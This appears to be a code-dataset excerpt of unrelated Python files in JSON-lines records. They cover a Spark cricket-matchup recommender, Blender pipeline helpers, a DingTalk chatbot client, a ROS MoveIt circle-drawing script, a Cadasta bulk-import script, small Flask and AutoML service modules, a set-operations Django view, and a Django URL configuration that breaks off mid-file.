You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\nCollaborative Filtering Classification Example.\n\"\"\"\nfrom __future__ import print_function\n\nfrom pyspark import SparkContext\nimport sys\n\n# $example on$\nfrom pyspark.mllib.recommendation import ALS, MatrixFactorizationModel, Rating\n# $example off$\n\nif __name__ == \"__main__\":\n    fp = open(\"./data/p\"+str(sys.argv[1])+\"_pred.csv\", \"w+\")\n    batsman = open(\"./data/batsman_index.csv\", \"r\")\n    bowler = open(\"./data/bowler_index.csv\", \"r\")\n\n    sc = SparkContext(appName=\"PythonCollaborativeFilteringExample\")\n    # $example on$\n    # Load and parse the data\n    data = sc.textFile(\"./data/p\"+str(sys.argv[1])+\".csv\")\n    batsmen = {}\n    b1 = {}\n    batsmen_index = 0\n    bowlers = {}\n    b2 = {}\n    bowlers_index = 0\n    for line in data.collect():\n        line = line.split(',')\n        if(line[0] not in list(batsmen.values())):\n            batsmen[batsmen_index] = line[0]\n            b1[line[0]] = batsmen_index\n            batsmen_index+=1\n\n        if(line[1] not in list(bowlers.values())):\n            bowlers[bowlers_index] = line[1]\n            b2[line[1]] = bowlers_index\n            bowlers_index+=1\n\n    \n    \n    ratings = data.map(lambda l: l.split(','))\\\n        .map(lambda l: Rating(b1[l[0]], b2[l[1]], float(l[2].rstrip('\\n'))))\n\n    # Build the recommendation model using Alternating Least Squares\n    rank = 10\n    numIterations = 10\n    model = ALS.train(ratings, rank, numIterations)\n\n\n    bat1 = open(\"Team1bats.csv\", \"r\")\n    bat2 = open(\"Team2bats.csv\", \"r\")\n    bowl1 = open(\"Team1bowl.csv\", \"r\")\n    bowl2 = open(\"Team2bowl.csv\", \"r\")\n    # two separate lists (x = y = [] would make x and y aliases of the same list)\n    x, y = [], []\n    for line in bowl1:\n        x.append(b2[line.rstrip('\\n')])\n    for line in bat1:\n        y.append(b1[line.rstrip('\\n')])\n    for i in x:\n        for j in y:\n            p = model.predict(j,i)\n            print(batsmen[j]+','+bowlers[i]+','+str(p))\n            fp.write(batsmen[j]+','+bowlers[i]+','+str(p)+'\\n')\n    x, y = [], []\n    for line in bowl2:\n        x.append(b2[line.rstrip('\\n')])\n    for line in bat2:\n        y.append(b1[line.rstrip('\\n')])\n    for i in x:\n        for j in y:\n            p = model.predict(j,i)\n            print(batsmen[j]+','+bowlers[i]+','+str(p))\n            fp.write(batsmen[j]+','+bowlers[i]+','+str(p)+'\\n')\n\n    \n    # Evaluate the model on training data\n    # testdata = ratings.map(lambda p: (p[0], p[1]))\n    # predictions = model.predictAll(testdata).map(lambda r: ((r[0], r[1]), r[2]))\n    # ratesAndPreds = ratings.map(lambda r: ((r[0], r[1]), r[2])).join(predictions)\n    # for item in predictions.collect():\n    #     print(item)\n    #     fp.write(batsmen[item[0][0]]+','+bowlers[item[0][1]]+',' + str(item[1])+'\\n')\n\n    # MSE = ratesAndPreds.map(lambda r: (r[1][0] - r[1][1])**2).mean()\n    # print(\"Mean Squared Error = \" + str(MSE))\n\n    # Save and load model\n    model.save(sc, \"models/target\"+str(sys.argv[1])+\"/tmp/myCollaborativeFilter\")\n    sameModel = MatrixFactorizationModel.load(sc, \"models/target\"+str(sys.argv[1])+\"/tmp/myCollaborativeFilter\")\n    # $example off$\n","sub_path":"src/probcalc/CollaborativeFiltering/CFPrediction.py","file_name":"CFPrediction.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"185860033","text":"\"\"\"Standalone helper functions.\"\"\"\n\nimport 
contextlib\nfrom typing import Dict, List, Union\n\nimport bpy\n\nfrom ..lib import logger\nfrom . import pipeline\n\n\ndef imprint(node: bpy.types.bpy_struct_meta_idprop, data: Dict):\n    r\"\"\"Write `data` to `node` as userDefined attributes\n\n    Arguments:\n        node: Long name of node\n        data: Dictionary of key/value pairs\n\n    Example:\n        >>> import bpy\n        >>> def compute():\n        ...     return 6\n        ...\n        >>> bpy.ops.mesh.primitive_cube_add()\n        >>> cube = bpy.context.view_layer.objects.active\n        >>> imprint(cube, {\n        ...     \"regularString\": \"myFamily\",\n        ...     \"computedValue\": lambda: compute()\n        ... })\n        ...\n        >>> cube['avalon']['computedValue']\n        6\n    \"\"\"\n\n    imprint_data = dict()\n\n    for key, value in data.items():\n        if value is None:\n            continue\n\n        if callable(value):\n            # Support values evaluated at imprint\n            value = value()\n\n        if not isinstance(value, (int, float, bool, str, list)):\n            raise TypeError(f\"Unsupported type: {type(value)}\")\n\n        imprint_data[key] = value\n\n    pipeline.metadata_update(node, imprint_data)\n\n\ndef lsattr(attr: str,\n           value: Union[str, int, bool, List, Dict, None] = None) -> List:\n    r\"\"\"Return nodes matching `attr` and `value`\n\n    Arguments:\n        attr: Name of Blender property\n        value: Value of attribute. If none\n            is provided, return all nodes with this attribute.\n\n    Example:\n        >>> lsattr(\"id\", \"myId\")\n        ... [bpy.data.objects[\"myNode\"]]\n        >>> lsattr(\"id\")\n        ... [bpy.data.objects[\"myNode\"], bpy.data.objects[\"myOtherNode\"]]\n\n    Returns:\n        list\n    \"\"\"\n\n    return lsattrs({attr: value})\n\n\ndef lsattrs(attrs: Dict) -> List:\n    r\"\"\"Return nodes with the given attribute(s).\n\n    Arguments:\n        attrs: Name and value pairs of expected matches\n\n    Example:\n        >>> lsattrs({\"age\": 5})  # Return nodes with an `age` of 5\n        # Return nodes with both `age` and `color` of 5 and blue\n        >>> lsattrs({\"age\": 5, \"color\": \"blue\"})\n\n    Returns:\n        list\n    \"\"\"\n\n    # For now return all objects, not filtered by scene/collection/view_layer.\n    matches = set()\n    for coll in dir(bpy.data):\n        if not isinstance(\n                getattr(bpy.data, coll),\n                bpy.types.bpy_prop_collection,\n        ):\n            continue\n        for node in getattr(bpy.data, coll):\n            for attr, value in attrs.items():\n                avalon_prop = node.get(pipeline.AVALON_PROPERTY)\n                if not avalon_prop:\n                    continue\n                if (avalon_prop.get(attr)\n                        and (value is None or avalon_prop.get(attr) == value)):\n                    matches.add(node)\n    return list(matches)\n\n\ndef read(node: bpy.types.bpy_struct_meta_idprop):\n    \"\"\"Return user-defined attributes from `node`\"\"\"\n\n    data = dict(node.get(pipeline.AVALON_PROPERTY))\n\n    # Ignore hidden/internal data\n    data = {\n        key: value\n        for key, value in data.items() if not key.startswith(\"_\")\n    }\n\n    return data\n\n\ndef get_selection() -> List[bpy.types.Object]:\n    \"\"\"Return the selected objects from the current scene.\"\"\"\n    return [obj for obj in bpy.context.scene.objects if obj.select_get()]\n\n\n@contextlib.contextmanager\ndef maintained_selection():\n    r\"\"\"Maintain selection during context\n\n    Example:\n        >>> with maintained_selection():\n        ...     # Modify selection\n        ...     
bpy.ops.object.select_all(action='DESELECT')\n >>> # Selection restored\n \"\"\"\n\n previous_selection = get_selection()\n previous_active = bpy.context.view_layer.objects.active\n try:\n yield\n finally:\n # Clear the selection\n for node in get_selection():\n node.select_set(state=False)\n if previous_selection:\n for node in previous_selection:\n try:\n node.select_set(state=True)\n except ReferenceError:\n # This could happen if a selected node was deleted during\n # the context.\n logger.exception(\"Failed to reselect\")\n continue\n try:\n bpy.context.view_layer.objects.active = previous_active\n except ReferenceError:\n # This could happen if the active node was deleted during the\n # context.\n logger.exception(\"Failed to set active object.\")\n","sub_path":"avalon/blender/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"1662552","text":"import requests \nimport time \nfrom .logger_setting import logger \n\n\n\n# Defining ChatBot specific Class to send messages to Dingtalk \n\nclass ChatBot: \n\n def send_markdown(self, payload, access_token, retry_time = 0, buffering = 5): \n\n \"\"\"\n Sending markdown content in payload to Dingtalk\n\n Parameters\n ----------\n payload : dict\n the information to be sent \n access_token : str\n the token of the DingTalk ChatBot that is given when generating the ChatBot\n example is https://oapi.dingtalk.com/robot/send?access_token={} \n the string behind the \"access_token\" is what to be input here\n retry_time : int\n number of times to retry sending the message \n buffering : int \n the number of seconds waiting between retries \n\n Returns\n -------\n bool\n True if successful\n \n Raises\n ------\n RuntimeError\n if failed to send message \n\n Examples\n --------\n\n \"\"\"\n\n url = \"https://oapi.dingtalk.com/robot/send?access_token=\" + str(access_token) \n headers = {\"Content-Type\": \"application/json;charset=utf-8\"}\n\n attempt = 0 \n\n while attempt == 0 or attempt < retry_time:\n logger.info(\"Sending to Dingtalk .....\")\n\n r = requests.post(url, headers = headers, json = payload) \n\n if (r.text == \"\"\"{\"errcode\":0,\"errmsg\":\"ok\"}\"\"\" or r.text == \"\"\"{\"errmsg\":\"ok\",\"errcode\":0}\"\"\"): \n logger.info(\"Message is sent.\")\n return True \n\n else: \n attempt += 1\n logger.error(\"Attempt {}. {}. 
Retrying .....\".format(attempt, r.text)) \n                time.sleep(buffering)\n                continue \n        \n        raise RuntimeError(\"Cannot send message due to: %s\" % r.text) \n\n\n\n    def send2ding(self, title, message, access_token, retry_time = 3, buffering = 5):\n\n        \"\"\"\n        Generate the payload from the inputs, attach it to the message and send it out to DingTalk\n        using send_markdown()\n\n        Parameters\n        ----------\n        title : str\n            title of the message \n        message : str\n            content of the message \n        access_token : str\n            the token of the DingTalk ChatBot that is given when generating the ChatBot\n            example is https://oapi.dingtalk.com/robot/send?access_token={} \n            the string behind the \"access_token\" is what to be input here \n        retry_time : int\n            number of times to retry sending the message \n        buffering : int \n            the number of seconds waiting between retries \n\n        Returns\n        -------\n        bool\n            True if successful\n\n        Raises\n        ------\n        RuntimeError\n            if failed to send message \n\n        Examples\n        --------\n        \n        \"\"\"\n\n        payload = {\n            \"msgtype\": \"markdown\",\n            \"markdown\": {\n                \"title\": title,\n                \"text\": message \n            }, \n            \"at\": {}\n        }\n\n        self.send_markdown(payload = payload, access_token = access_token, retry_time = retry_time, buffering = buffering) \n","sub_path":"pyool/chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"135051084","text":"#!/usr/bin/env python\n\nimport sys\nimport copy\nimport rospy\nimport moveit_commander\nimport moveit_msgs.msg\nimport geometry_msgs.msg\nfrom geometry_msgs.msg import Point\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\nimport math\nimport rosbag\n\nclass Line_Marker(object):\n    def __init__(self, marker_topic, queue_size, orien_w, orien_x, orien_y, orien_z, pos_x, pos_y, pos_z):\n        self._marker_topic = marker_topic\n        self._publisher = rospy.Publisher(self._marker_topic, Marker, queue_size=queue_size)\n\n        self._marker = Marker()\n        self._marker.lifetime = rospy.Duration()\n        self._marker.header.frame_id = \"/base_link\"\n        self._marker.type = self._marker.LINE_STRIP\n        self._marker.action = self._marker.ADD\n        self._marker.scale.x = 0.05\n        self._marker.color.a = 1.0\n        self._marker.color.r = 0.0\n        self._marker.color.g = 1.0\n        self._marker.color.b = 0.0\n        self._marker.pose.orientation.w = orien_w\n        self._marker.pose.orientation.x = orien_x\n        self._marker.pose.orientation.y = orien_y\n        self._marker.pose.orientation.z = orien_z\n        self._marker.pose.position.x = pos_x\n        self._marker.pose.position.y = pos_y\n        self._marker.pose.position.z = pos_z\n        self._marker.points = []\n\n    def add_new_point(self, x, y, z):\n        pt = Point()\n        pt.x = x\n        pt.y = y\n        pt.z = z\n        self._marker.points.append(pt)\n\n    def get_marker_ptr(self):\n        return self._marker\n\n    def publish_marker(self):\n        rospy.sleep(20)\n        print(\"publishing line marker ...\")\n        self._publisher.publish(self._marker)\n\n    def write_to_rosbag(self, bag_name):\n        print(\"writing marker to rosbag (circle)...\")\n        bag = rosbag.Bag(bag_name, 'w')\n        try:\n            bag.write(self._marker_topic, self._marker, rospy.Time.now())\n        finally:\n            bag.close()\n    \n    def read_from_rosbag_and_publish(self, bag_name):\n        print(\"reading marker from rosbag (circle)...\")\n        msg_from_bag = None\n        marker_bag = rosbag.Bag(bag_name)\n        # read all messages from the indicated topics:\n        for topic, msg, t in marker_bag.read_messages(topics=[self._marker_topic]):\n            if topic == self._marker_topic:\n                msg_from_bag = msg\n        
self._publisher.publish(msg_from_bag)\n\n# initialise the moveit_commander module (which allows us to communicate with the MoveIt Rviz interface)\nmoveit_commander.roscpp_initialize(sys.argv)\nrospy.init_node('move_group_python_interface_1', anonymous=True)\n\n# create RobotCommander obj (an interface to our robot):\nrobot = moveit_commander.RobotCommander()\n# create PlanningSceneInterface obj (an interface to the world that surrounds the robot):\nscene = moveit_commander.PlanningSceneInterface()\n# create MoveGroupCommander obj to allow us to interact with the 'manipulator' set of joints:\ngroup = moveit_commander.MoveGroupCommander(\"manipulator\")\n# create topic publisher to allow MoveIt Rviz to visualise our planned motion:\ndisplay_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path', \n                                               moveit_msgs.msg.DisplayTrajectory, \n                                               queue_size=20)\n\nmarker_topic = 'visualization_marker'\nline_marker = Line_Marker(marker_topic=marker_topic, orien_w=1.0, \n                          orien_x=0, orien_y=0, orien_z=0, pos_x=0, \n                          pos_y=0, pos_z=0, queue_size=10)\n\n# set joints to home position first:\nprint(\"bringing robot to home position ...\")\njoint_goal = group.get_current_joint_values()\njoint_goal[0] = 0\njoint_goal[1] = -math.pi/2\njoint_goal[2] = math.pi/2\njoint_goal[3] = -math.pi/2\njoint_goal[4] = -math.pi/2\njoint_goal[5] = 0\ngroup.go(joint_goal, wait=True)\ngroup.stop()\n\n\n# draw a circle:\nwaypoints = []\nscale = 1.5\nwpose = group.get_current_pose().pose\nx_center = wpose.position.x\ny_center = wpose.position.y\nradius = 0.2\n\n# first move down onto the drawing plane:\nwpose.position.z -= scale * 0.2\nwpose.position.x += radius # move from centre to one end of the circle\nwaypoints.append(copy.deepcopy(wpose))\nline_marker.add_new_point(wpose.position.x, wpose.position.y, wpose.position.z)\n\nprint(\"generating points along circumference ...\")\n# tolerances required to execute this are beyond the capabilities of the controller!\n# find a way for ur5 to draw curves \nfor i in range(360 // 2): # 180 waypoints, one every 2 degrees; integer division keeps range() happy on Python 3\n    theta = i*math.pi/(180/2) # rad\n    wpose.position.x = x_center + radius*math.cos(theta)\n    wpose.position.y = y_center + radius*math.sin(theta)\n    waypoints.append(copy.deepcopy(wpose))\n    line_marker.add_new_point(wpose.position.x, wpose.position.y, wpose.position.z)\n    \n\n# finally move away from the drawing plane:\nwpose.position.z += scale * 0.2 # move back up (z)\nwpose.position.x -= radius # move from other end of circle back to centre\nwaypoints.append(copy.deepcopy(wpose))\n\n\n# Here we want the cartesian path to be interpolated at a resolution of 1cm, \n# hence eef_step=0.01 in cartesian translation.\n# Here we ignore checks for infeasible jumps in joint space\n(plan, fraction) = group.compute_cartesian_path( \n                       waypoints=waypoints, # waypoints to follow\n                       eef_step=0.01, # eef_step\n                       jump_threshold=0.0) # jump_threshold\n\ndisplay_trajectory = moveit_msgs.msg.DisplayTrajectory()\ndisplay_trajectory.trajectory_start = robot.get_current_state()\ndisplay_trajectory.trajectory.append(plan)\n# publish:\ndisplay_trajectory_publisher.publish(display_trajectory)\n\n'''\n## ONLY USE THE BELOW CODE WHEN RUNNING .PY WITHIN SCRIPTS DIRECTORY! 
\n# (env in shebang does not have the necessary bag_msg_ folders)\n## --- ROSBAG CODE (WRITE): ----\nprint(\"writing trajectory to rosbag (circle)...\")\nbag = rosbag.Bag('bag_msgs_circle/display_trajectory_circle.bag', 'w')\ntry:\n    bag.write('/move_group/display_planned_path', display_trajectory, rospy.Time.now())\nfinally:\n    bag.close()\n## --- ROSBAG CODE (READ): do not run at the same time as the rosbag write code! ---\nprint(\"reading trajectory from rosbag (circle)...\")\nmsg_from_bag = None\ncircle_bag = rosbag.Bag('bag_msgs_circle/display_trajectory_circle.bag')\n# read all messages from the indicated topics:\nfor topic, msg, t in circle_bag.read_messages(topics=['/move_group/display_planned_path']):\n    if topic == '/move_group/display_planned_path':\n        msg_from_bag = msg\ndisplay_trajectory_publisher.publish(msg_from_bag)\n'''\n\nprint(\"drawing shape trajectory ...\")\nline_marker.publish_marker()\n'''\n## ONLY USE THE BELOW CODE WHEN RUNNING .PY WITHIN SCRIPTS DIRECTORY!\n# (env in shebang does not have the necessary bag_msg_ folders)\nline_marker.write_to_rosbag('bag_msgs_circle/marker_bag_circle.bag')\nline_marker.read_from_rosbag_and_publish('bag_msgs_circle/marker_bag_circle.bag')\n'''\n\nprint(\"executing plan ...\")\ngroup.execute(plan, wait=True)\n\nrospy.sleep(5)\n\nprint(\"finished, going to sleep now\")\nmoveit_commander.roscpp_shutdown()\n\n","sub_path":"my_motion_scripts/scripts/planning_script_circle.py","file_name":"planning_script_circle.py","file_ext":"py","file_size_in_byte":7075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"92027173","text":"import csv\nimport json\nimport requests\nimport getpass\n\n# ===================================== set up your account ============================================\n\nplatform = 'demo'\nbase = 'https://' + platform + '.cadasta.org/'\norganization_slug = '{organization_name}'\nproject_slug = '{project_name}'\nfilePath = '{file_path}'\nname = '{username}'\n# getpass prompts for the password without echoing it to the terminal\npw = getpass.getpass('Enter your password')\n\n# ===================================== get access token ============================================\nresp = requests.post('https://platform-staging.cadasta.org/api/v1/account/login/', {'username': name, 'password': pw})\ntoken = resp.json()['auth_token']\nheaders = {'Authorization': 'token ' + token}\n\n# ===================================== open csv file ============================================\nwith open(filePath,'rU') as csvfile:\n    reader = csv.DictReader(csvfile)\n    for row in reader:\n        # ================================ party fields and resources =================================\n        partyAttributes = {\n            \"name\": row['party_name'],\n            \"type\": row['party_type'],\n            \"attributes\":{\n                \"party_religion\": row['party_religion'],\n                \"party_caste_cert\": row['party_caste_cert'],\n                \"party_category\": row['party_category'],\n            }\n        }\n        partyUrl = base + 'api/v1/organizations/' + organization_slug + '/projects/' + project_slug + '/parties/'\n        partyResp = requests.post(partyUrl, json=partyAttributes, headers=headers)\n        partyResp.raise_for_status()\n        print('Party ::', partyResp.json())\n        partyId = partyResp.json()['id']\n\n        partyResource = {\n            \"name\": row['party_name'],\n            \"description\": \"\",\n            \"original_file\": row['party_resource_photo'],\n            \"file\": \"https://s3-us-west-2.amazonaws.com/cadasta-platformprod-bucket/resources/\" + row['party_resource_photo']\n        }\n        partyResourceUrl = 
partyUrl + partyId + '/resources/'\n        partyResourceResponse = requests.post(partyResourceUrl, json=partyResource, headers=headers)\n        print('Party Resource ::', partyResourceResponse.status_code)\n        print('Party Resource ::', partyResourceResponse.json())\n\n        # ================================ location fields and resources =================================\n        # parse the assembled GeoJSON string into a dict so requests can serialise it properly\n        geom = json.loads('{\"type\":\"'+ row[\"geo_type\"] + '\",\"coordinates\": '+ row[\"location_geometry\"]+ '}')\n        locationAttributes = {\n            \"type\":\"Feature\",\n            \"geometry\": geom,\n            \"properties\":{\n                \"type\": row['location_type'],\n                \"attributes\":{\n                    \"cook_day\": row['cook_day'],\n                    \"water_buy\": row['water_buy'],\n                    \"drainline\": row['drainline'],\n                    \"location_slumname\": row['location_slumname'],\n                    \"location_city_ward\": row['location_city_ward'],\n                    \"toilet_paid\": row['toilet_paid']\n                }\n            }\n        }\n\n        locationUrl = base + 'api/v1/organizations/' + organization_slug + '/projects/' + project_slug + '/spatial/'\n        locationResp = requests.post(locationUrl, json=locationAttributes, headers=headers)\n        print('Location ::', locationResp.status_code)\n        print('Location ::', locationResp.json())\n        locationId = locationResp.json()['properties']['id']\n\n        locationResource = {\n            \"name\": row['party_name'],\n            \"description\": \"\",\n            \"original_file\": row['location_resource_photo'],\n            \"file\": \"https://s3-us-west-2.amazonaws.com/cadasta-platformprod-bucket/resources/\" + row['location_resource_photo']\n        }\n\n        locationResourceUrl = locationUrl + locationId + '/resources/'\n        locationResourceResp = requests.post(locationResourceUrl, json=locationResource, headers=headers)\n        print('Location Resource ::', locationResourceResp.status_code)\n        print('Location Resource ::', locationResourceResp.json())\n\n        # ================================ tenure fields and resources =================================\n        tenureAttributes = {\n            \"tenure_type\": row['tenure_type'],\n            \"party\": partyId,\n            \"spatial_unit\": locationId,\n            \"attributes\":{\n                \"residential_status\": row['residential_status'],\n                \"occupancy_type\": row['occupancy_type'],\n                \"land_own_notes\": row['land_own_notes']\n            }\n        }\n\n        tenureUrl = base + 'api/v1/organizations/' + organization_slug + '/projects/' + project_slug + '/relationships/tenure/'\n        tenureResp = requests.post(tenureUrl, json=tenureAttributes, headers=headers)\n        print('Tenure ::', tenureResp.status_code)\n        print('Tenure ::', tenureResp.json())\n        tenureId = tenureResp.json()['id']\n\n        tenureResource = {\n            \"name\": row['party_name'],\n            \"description\": \"\",\n            \"file\": \"https://s3-us-west-2.amazonaws.com/cadasta-platformprod-bucket/resources/\" + row['tenure_resource_photo']\n        }\n\n        tenureResourceUrl = tenureUrl + tenureId + '/resources/'\n        tenureResourceResp = requests.post(tenureResourceUrl, json=tenureResource, headers=headers)\n        print('Tenure Resource ::', tenureResourceResp.status_code)\n        print('Tenure Resource ::', tenureResourceResp.json())\n","sub_path":"bulk-import/all-endpoints/all-endpoint-script.py","file_name":"all-endpoint-script.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"57957234","text":"from flask import make_response\nimport json\n\nbaseURL = \"http://youlanedu.com/api/backendManage/\"\nOrigin = 'http://localhost:7050'\n\nretModel = {\n    
\"code\": 0,\n \"msg\": \"\",\n \"data\": {},\n}\n\ndef makeRespose(res, code=200):\n tmp = make_response(json.dumps(res))\n return tmp, code\n","sub_path":"conf/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"11704635","text":"\"\"\"Doc.\"\"\"\nimport os\nimport time\nimport json\nimport logging\nfrom subprocess import Popen\nfrom werkzeug.utils import secure_filename\n\nfrom utils import read_csv\nfrom storage_factory import ds, fs, put_result, get_result\n\n\nMODEL_LIST = 'zero linear tree forest'.split()\n\n\nclass Processor:\n\n def __init__(self):\n pass\n\n def get_file(self, user_id):\n try:\n return ds.get('file', user_id)\n except FileNotFoundError:\n return {'filename': \"No file yest, please upload one\"}\n\n def upload(self, user_id, file):\n source_filename = secure_filename(file.filename)\n filename = '-'.join(['data', user_id, source_filename])\n ds.put('file', user_id, {'filename': filename, 'source_filename': source_filename})\n fs.save(filename, file)\n path = fs.get_path(filename)\n vl = []\n message = \"{}\"\n try:\n df = read_csv(path)\n for c in df.columns:\n vl.append(c + 'p')\n self.set_target(user_id, {'target':','.join(vl)})\n except Exception as e:\n logging.warning(e)\n message = \"Failed to parse {}\" \n fs.delete(filename)\n ds.delete('file', user_id)\n return json.dumps({'name': message.format(source_filename)})\n\n def get_target(self, user_id):\n r = ds.get('target', user_id)\n return r\n\n def set_target(self, user_id, t):\n ds.put('target', user_id, t)\n return None\n\n def _run_job(self, user_id, model):\n logging.info('run {}'.format(model))\n put_result(model, user_id, 'running', 'starting...')\n cmd = \"python automl_run.py {} {}\".format(user_id, model)\n # fname_out = \"{}/run-{}-{}.log\".format(LOG_FOLDER, user_id, model)\n # with open(fname_out, \"wb\") as out:\n job = Popen(cmd, shell=True)\n logging.debug('rcode {}'.format(job.returncode))\n \n def run_job(self, user_id, job):\n for m in MODEL_LIST:\n self._run_job(user_id, m)\n return self.get_result(user_id)\n \n def get_result(self, user_id):\n\n def getr(m):\n return get_result(m, user_id)\n\n r = list(map(getr , MODEL_LIST))\n j = {}\n for m, rr in zip(MODEL_LIST, r):\n j[m] = rr\n \n sd = ds.get('score_desc', user_id)\n j['score_desc'] = sd['score_desc'] if sd else 'Result'\n return j\n","sub_path":"app_processor.py","file_name":"app_processor.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"31039577","text":"from django.shortcuts import render\nfrom user_interface.forms import Form\nfrom user_interface.inputHandling import cleanUp\nfrom user_interface import setsOperations\n\n\ndef index(request):\n context = {}\n if request.method == \"POST\":\n context['display'] = 'false'\n form = Form(request.POST)\n set1 = cleanUp(request.POST['set1'])\n set2 = cleanUp(request.POST['set2'])\n choice = request.POST['choice']\n if 'venn_diagram' in request.POST:\n generateVennDiagram = True\n else:\n generateVennDiagram = False\n if choice == 'union':\n context['return_set'] = set1.union(set2)\n elif choice == 'intersection':\n context['return_set'] = set1.intersection(set2)\n elif choice == 'difference':\n context['return_set'] = set1.difference(set2)\n elif choice == 'subset':\n context['return_set'] = setsOperations.subset_checker(set1, set2)\n elif choice == 'cartesian':\n 
context['return_set'] = setsOperations.cartesian_product(set1, set2)\n elif choice == 'member':\n user_input = request.POST['user_input']\n try:\n user_input = int(user_input)\n print(set1, set2, user_input)\n context['return_set'] = setsOperations.membership(set1, set2, user_input)\n except:\n context['return_set'] = \"Invalid input for the membership operation\"\n if generateVennDiagram:\n setsOperations.venn_diagram_generator(set1, set2, setsOperations.membership(set1, set2, choice), choice)\n context['display_diagram'] = 'true'\n else:\n context['display_diagram'] = 'false'\n else:\n form = Form()\n context['form'] = Form()\n context['display'] = 'true'\n return render(request, 'index.html', context)\n","sub_path":"sets/user_interface/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"130698679","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom fotos.views import *\nfrom videos.views import *\nfrom website_content.views import *\nfrom noticias.views import *\nfrom links.views import *\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^grappelli/', include('grappelli.urls')),\n url(r'^cursos/accounts/', include('allauth.urls')),\n\n # Landing Base Page\n url(r'^$', TemplateView.as_view(template_name='index.html'), name='index'),\n\n # Elearning App\n #url(r'^cursos/$', TemplateView.as_view(template_name='cursos/index.html'), name='cursos'),\n url(r'^cursos/$', 'autoresponse.views.autoresponse', name='cursos'),\n\n # Portuguese\n url(r'^dra.froes-clinica/$', 'curriculum.views.curriculum', name='index_clinica'),\n url(r'^dra.froes-clinica/clinica/$', CategoriasList.as_view(template_name=\"br/clinica.html\"), name='clinica_clinica'),\n url(r'^dra.froes-clinica/publicacoes/(?P\\D+)$', 'publicaciones.views.publicacoes', name='publicaciones'),\n url(r'^dra.froes-clinica/links/$', LinksView.as_view(), name='links'),\n url(r'^dra.froes-clinica/videos/$', 'videos.views.videos', name='videos'),\n url(r'^dra.froes-clinica/agenda/$', 'fotos.views.fotos', name='agenda'),\n url(r'^dra.froes-clinica/cadastro/$', 'cadastro.views.cadastro', name='cadastro'),\n url(r'^dra.froes-clinica/noticias/$', NoticiasList.as_view(), name='noticias'),\n url(r'^dra.froes-clinica/contato/$', 'contact_form.views.contato', name='contacto'),\n\n # English\n url(r'^en/dra.froes-clinic/$', 'curriculum.views.curriculum_en', name='index_clinica_en'),\n url(r'^en/dra.froes-clinic/biofisio_office/$', CategoriasList.as_view(template_name=\"en/clinica.html\"), name='clinica_clinica_en'),\n url(r'^en/dra.froes-clinic/publications/(?P\\D+)$', 'publicaciones.views.publications', name='publicaciones_en'),\n url(r'^en/dra.froes-clinic/links/$', LinksEnView.as_view(), name='links_en'),\n url(r'^en/dra.froes-clinic/videos/$', 'videos.views.videos_en', name='videos_en'),\n url(r'^en/dra.froes-clinic/agenda/$', 'fotos.views.fotos_en', name='agenda_en'),\n url(r'^en/dra.froes-clinic/news/$', NewsList.as_view(), name='noticias_en'),\n url(r'^en/dra.froes-clinic/contact_us/$', 'contact_form.views.contact', name='contacto_en'),\n\n # Spanish\n url(r'^es/dra.froes-clinica/$', 'curriculum.views.curriculum_en', name='index_clinica_es'),\n url(r'^es/dra.froes-clinica/clinica/$', CategoriasList.as_view(template_name=\"es/clinica.html\"), name='clinica_clinica_es'),\n 
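# The user_interface/views.py record above feeds request.POST values through a
# cleanUp helper before calling set methods on the result. cleanUp's source is
# not part of this section, so the following is only a plausible sketch,
# assuming it turns text like "{1, 2, 3}" into a set of ints; the real helper
# in user_interface.inputHandling may differ.
def cleanUp(raw):
    tokens = raw.replace('{', ' ').replace('}', ' ').replace(',', ' ').split()
    return {int(t) for t in tokens if t.lstrip('-').isdigit()}

# e.g. cleanUp("{1, 2, 3}") == {1, 2, 3}, after which set1.union(set2),
# set1.intersection(set2) and set1.difference(set2) work as used in the view.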
